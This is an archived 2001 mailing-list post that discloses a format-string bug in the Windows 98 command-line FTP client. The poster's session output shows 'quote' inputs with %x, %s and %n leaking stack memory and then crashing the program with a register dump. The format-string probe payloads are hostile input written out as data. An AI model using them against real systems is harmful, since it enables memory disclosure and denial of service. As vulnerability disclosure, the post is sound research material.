Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Microsoft FTP Program

From: SteeLe <steeLe () PRIVACYX COM>
Date: Wed, 21 Mar 2001 07:47:35 -0500
While playin around in the Microsoft FTP program that came with Windows 98 I came across the following :

Connected to l33t host.
220 FTP server (Version 6.00LS) ready.
User (somewhere()): ftp
331 Guest login ok, send your email address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> quote
Command line to send
Usage: quote line to send.
ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x
500 '0X7800BB4B.0X10072B8.0X1008820.0X0.0X56F3E8.0X78257830.0X2578302E.0X78302E7
8': command not understood.
ftp> quote %s
500 '+(|X+++YX++_ZX++|QX+++VX++ÇQX++êSX+++¦X++_ÄX++4òX+++òX++-VX+++V
X+++VX+J_0___T__¦W_Y__T_Uï_QQVW+-¦XH': command not understood.
ftp> quote %n

And that crashed the program......

FTP caused an invalid page fault in
module KERNEL32.DLL at 0167:bff9d709.
Registers:
EAX=c00300f0 CS=0167 EIP=bff9d709 EFLGS=00010216
EBX=00000000 SS=016f ESP=0052feb8 EBP=00530154
ECX=00000000 DS=016f ESI=00690100 FS=1c2f
EDX=780376e8 ES=016f EDI=01001550 GS=0000
Bytes at CS:EIP:
53 8b 15 dc 9c fc bf 56 89 4d e4 57 89 4d dc 89 
Stack dump:

I do know that the ftp program in most linux distros had this problem a while back but who knew it would pass on to 
Windows.

Might not be important but someone should comment on this :)

SteeLe
Previous By Date Next
Previous By Thread Next

Current thread: